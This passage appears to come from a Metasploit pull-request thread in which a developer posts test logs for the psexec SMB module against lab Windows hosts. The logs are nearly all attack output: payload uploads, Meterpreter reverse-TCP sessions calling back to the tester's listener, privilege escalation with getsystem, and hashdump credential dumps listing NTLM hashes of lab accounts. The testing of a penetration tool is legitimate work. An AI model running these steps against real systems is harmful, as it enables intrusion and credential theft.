   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.5.134.189     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
                                                    s/using-metasploit.html
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               vagrant          no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read
                                                    /write folder share
   SMBUser               vagrant          no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

bwatters-r7 commented 10 months ago

Windows 2003x86

:green_circle: Win2003x86 SP0

``` msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.132.158:445 - Connecting to the server... [*] 10.5.132.158:445 - Authenticating to 10.5.132.158:445 as user 'Administrator'... [*] 10.5.132.158:445 - Selecting native target [*] 10.5.132.158:445 - Uploading payload... aXIVUwWT.exe [*] 10.5.132.158:445 - Created \aXIVUwWT.exe... [+] 10.5.132.158:445 - Service started successfully... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.132.158 [*] 10.5.132.158:445 - Deleting \aXIVUwWT.exe... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.132.158:1031) at 2024-01-12 09:41:24 -0600 meterpreter > sysinfo Computer : WIN2K3X86 OS : Windows Server 2003 (5.2 Build 3790). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > hashdump Administrator:500:79cad4f26761891bd408e6b105741864:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:c4c73d23dae70d1bd4ace8ea74759f2f::: ```

:green_circle: Win2003x86 SP1

``` msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.132.146:445 - Connecting to the server... [*] 10.5.132.146:445 - Authenticating to 10.5.132.146:445 as user 'Administrator'... [*] 10.5.132.146:445 - Selecting native target [*] 10.5.132.146:445 - Uploading payload... FazYUXIy.exe [*] 10.5.132.146:445 - Created \FazYUXIy.exe... [+] 10.5.132.146:445 - Service started successfully... [*] 10.5.132.146:445 - Deleting \FazYUXIy.exe... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.132.146 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 5 opened (10.5.135.201:4444 -> 10.5.132.146:1031) at 2024-01-12 09:46:54 -0600 meterpreter > sysinfo Computer : WIN2K3X86-SP1 OS : Windows Server 2003 (5.2 Build 3790, Service Pack 1). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > hashdump Administrator:500:79cad4f26761891bd408e6b105741864:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:f444651e81b599aa0c731d0890225ca8::: meterpreter > ```

:green_circle: Win2003x86R2 SP1

``` msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.132.114:445 - Connecting to the server... [*] 10.5.132.114:445 - Authenticating to 10.5.132.114:445 as user 'Administrator'... [*] 10.5.132.114:445 - Selecting native target [*] 10.5.132.114:445 - Uploading payload... yzkSdpVI.exe [*] 10.5.132.114:445 - Created \yzkSdpVI.exe... [+] 10.5.132.114:445 - Service started successfully... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.132.114 [*] 10.5.132.114:445 - Deleting \yzkSdpVI.exe... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 6 opened (10.5.135.201:4444 -> 10.5.132.114:1030) at 2024-01-12 09:50:01 -0600 meterpreter > sysinfo Computer : WIN2K3X86-R2 OS : Windows Server 2003 (5.2 Build 3790, Service Pack 1). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > hashdump Administrator:500:79cad4f26761891bd408e6b105741864:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:e2689e8bf8c708128fee5ff6c68e81c8::: meterpreter > ```

:green_circle: Win2003x86R2 SP2

``` msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.132.175:445 - Connecting to the server... [*] 10.5.132.175:445 - Authenticating to 10.5.132.175:445 as user 'Administrator'... [*] 10.5.132.175:445 - Selecting native target [*] 10.5.132.175:445 - Uploading payload... iThhOxfH.exe [*] 10.5.132.175:445 - Created \iThhOxfH.exe... [+] 10.5.132.175:445 - Service started successfully... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.132.175 [*] 10.5.132.175:445 - Deleting \iThhOxfH.exe... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 7 opened (10.5.135.201:4444 -> 10.5.132.175:1033) at 2024-01-12 09:52:25 -0600 meterpreter > sysinfo Computer : WIN2K3X86-R2-SP OS : Windows Server 2003 (5.2 Build 3790, Service Pack 2). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > hashdump Administrator:500:79cad4f26761891bd408e6b105741864:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:82eaedbeecf4a6f6e1b1f57e3c1b451b::: meterpreter > ```

bwatters-r7 commented 10 months ago

Windows 8x86

:green_circle: Windows 8x86

``` msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.115:445 - Connecting to the server... [*] 10.5.134.115:445 - Authenticating to 10.5.134.115:445 as user 'vagrant'... [*] 10.5.134.115:445 - Selecting PowerShell target [*] 10.5.134.115:445 - Executing the payload... [+] 10.5.134.115:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.115 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 3 opened (10.5.135.201:4444 -> 10.5.134.115:49180) at 2024-01-12 13:53:55 -0600 meterpreter > sysinfo Computer : WIN8X86 OS : Windows 8 (6.2 Build 9200). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1001:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: meterpreter > ```

:green_circle: Windows 8.1x86

``` msf6 payload(windows/meterpreter/reverse_tcp) > [*] Started reverse TCP handler on 10.5.135.201:4587 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.153 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 1 opened (10.5.135.201:4587 -> 10.5.134.153:49186) at 2024-01-12 13:42:04 -0600 msf6 payload(windows/meterpreter/reverse_tcp) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : WIN81X86 OS : Windows 8.1 (6.3 Build 9600). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > getuid Server username: WIN81X86\vagrant meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1001:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: meterpreter > getsystem WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > ```

:green_circle: Windows 8.1 x86 SP1

``` msf6 payload(windows/meterpreter/reverse_tcp) > sessions -i 2 [*] Starting interaction with 2... meterpreter > sysinfo Computer : WIN81X86SP1 OS : Windows 8.1 (6.3 Build 9600). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > getuid Server username: WIN81X86SP1\vagrant meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1001:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: meterpreter > getsystem WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > ```

bwatters-r7 commented 10 months ago

:green_circle: Windows 10x86

``` msf6 exploit(windows/smb/psexec) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 4 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86 10.5.135.201:4444 -> 10.5.134.109:49764 (10.5.134.109) 5 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_1809 10.5.135.201:4444 -> 10.5.134.117:49758 (10.5.134.117) 6 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_2004 10.5.135.201:4444 -> 10.5.134.133:49787 (10.5.134.133) 7 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_1703 10.5.135.201:4444 -> 10.5.134.144:49826 (10.5.134.144) 8 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_1607 10.5.135.201:4444 -> 10.5.134.148:49761 (10.5.134.148) 9 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_1511 10.5.135.201:4444 -> 10.5.134.162:49897 (10.5.134.162) 10 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_1709 10.5.135.201:4444 -> 10.5.134.167:49760 (10.5.134.167) 11 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_21H1 10.5.135.201:4444 -> 10.5.134.189:49753 (10.5.134.189) 12 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_20H2 10.5.135.201:4444 -> 10.5.134.193:49785 (10.5.134.193) 13 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN10X86_1803 10.5.135.201:4444 -> 10.5.134.199:49764 (10.5.134.199) msf6 exploit(windows/smb/psexec) > sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 4 (10.5.134.109) Computer : WIN10X86 OS : Windows 10 (10.0 Build 10240). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 5 (10.5.134.117) Computer : WIN10X86_1809 OS : Windows 10 (10.0 Build 17763). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 6 (10.5.134.133) Computer : WIN10X86_2004 OS : Windows 10 (10.0 Build 19041). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 7 (10.5.134.144) Computer : WIN10X86_1703 OS : Windows 10 (10.0 Build 15063). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 8 (10.5.134.148) Computer : WIN10X86_1607 OS : Windows 10 (10.0 Build 14393). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 9 (10.5.134.162) Computer : WIN10X86_1511 OS : Windows 10 (10.0 Build 10586). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 10 (10.5.134.167) Computer : WIN10X86_1709 OS : Windows 10 (10.0 Build 16299). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 11 (10.5.134.189) Computer : WIN10X86_21H1 OS : Windows 10 (10.0 Build 19043). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 12 (10.5.134.193) Computer : WIN10X86_20H2 OS : Windows 10 (10.0 Build 19042). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 13 (10.5.134.199) Computer : WIN10X86_1803 OS : Windows 10 (10.0 Build 17134). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows msf6 exploit(windows/smb/psexec) > sessions -C hashdump [*] Running 'hashdump' on meterpreter session 4 (10.5.134.109) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 5 (10.5.134.117) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4f7edbd6c1a8dcce95bc7a2eaaea4e7d::: [*] Running 'hashdump' on meterpreter session 6 (10.5.134.133) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:68a2e28163bf0d5b71f8c29d6854fe14::: [*] Running 'hashdump' on meterpreter session 7 (10.5.134.144) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: 